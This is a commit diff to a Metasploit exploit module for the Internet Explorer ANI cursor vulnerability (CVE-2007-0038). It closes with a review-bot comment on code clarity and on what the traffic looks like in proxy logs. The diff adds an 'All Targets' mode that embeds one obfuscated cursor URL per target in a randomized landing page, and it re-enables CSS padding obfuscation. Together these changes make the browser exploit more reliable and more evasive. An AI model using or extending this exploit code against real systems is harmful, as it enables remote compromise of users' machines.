This module now defaults to using all targets at once :-)
git-svn-id: file:///home/svn/framework3/trunk@4596 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e707423987
commit
24ba17aceb
|
@ -71,6 +71,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
#
|
||||
# Use multiple cursor URLs to try all targets at once
|
||||
# This can result in multiple, sequential sessions
|
||||
#
|
||||
[ 'All Targets', { }],
|
||||
|
||||
#
|
||||
# The following targets use call [ebx+4], just like the original exploit
|
||||
#
|
||||
|
@ -118,37 +124,57 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
targ = nil
|
||||
exts = ['bmp', 'wav', 'png', 'zip', 'tar']
|
||||
gext = exts[rand(exts.length)]
|
||||
mext = request.uri =~ /\.(...)$/
|
||||
|
||||
ruri, qstr = request.uri.split('?')
|
||||
|
||||
if (qstr and qstr =~ /.*=(\d+)/)
|
||||
targ = $1.to_i
|
||||
end
|
||||
|
||||
mext = ruri =~ /\.(...)$/
|
||||
if (not (mext and exts.include?($1)))
|
||||
|
||||
html =
|
||||
"<html><head><title>" + rand_text_alphanumeric(rand(128)+4) +
|
||||
"</title></head><body>" + rand_text_english(rand(1024)+1) +
|
||||
"<div style='" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("cursor") +
|
||||
generate_css_padding() +
|
||||
":" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("url(") +
|
||||
generate_css_padding() +
|
||||
'"' +
|
||||
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
||||
'"' +
|
||||
generate_css_padding() +
|
||||
");" +
|
||||
generate_css_padding() +
|
||||
"'>" +
|
||||
generate_padding() +
|
||||
"</div>"
|
||||
"<html><head><title>" +
|
||||
rand_text_alphanumeric(rand(128)+4) +
|
||||
"</title>" +
|
||||
"</head><body>" + rand_text_alphanumeric(rand(128)+1)
|
||||
|
||||
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
||||
|
||||
mytargs.each_index do |i|
|
||||
html << "<div style='" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("cursor") +
|
||||
generate_css_padding() +
|
||||
":" +
|
||||
generate_css_padding() +
|
||||
Rex::Text.to_rand_case("url(") +
|
||||
generate_css_padding() +
|
||||
'"' +
|
||||
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
||||
"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
|
||||
'"' +
|
||||
generate_css_padding() +
|
||||
");" +
|
||||
generate_css_padding() +
|
||||
"'>" +
|
||||
generate_padding() +
|
||||
"</div>"
|
||||
end
|
||||
|
||||
send_response_html(cli, html)
|
||||
return
|
||||
end
|
||||
|
||||
# Set the requested target
|
||||
if (targ and targets[targ])
|
||||
target = targets[targ]
|
||||
end
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
|
@ -250,8 +276,6 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def generate_css_padding
|
||||
return ''
|
||||
|
||||
buf =
|
||||
generate_whitespace() +
|
||||
"/*" +
|
||||
|
|
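Review bot: on_request_uri in the second hunk now handles two kinds of request, the landing page and the per-target cursor resources, but nothing in the method says that the index appended as `?<name>=#{i}` in the `mytargs.each_index` loop is what `qstr =~ /.*=(\d+)/` reads back. A comment above the parse would cover it, e.g. `# Numeric query value is a client-supplied index into targets; ignored when targets[targ] is nil`. The two uses of `$1` (`targ = $1.to_i`, `exts.include?($1)`) would read more clearly as `Regexp.last_match(1)` or a named capture. Read from the detection side, the loop means a single landing page references one cursor URL per target, all sharing one of the five listed extensions and each carrying a numeric query value, so that cluster of requests is what shows up in proxy logs. The method continues past the end of the hunk, so how the selected target is used afterwards is not visible here.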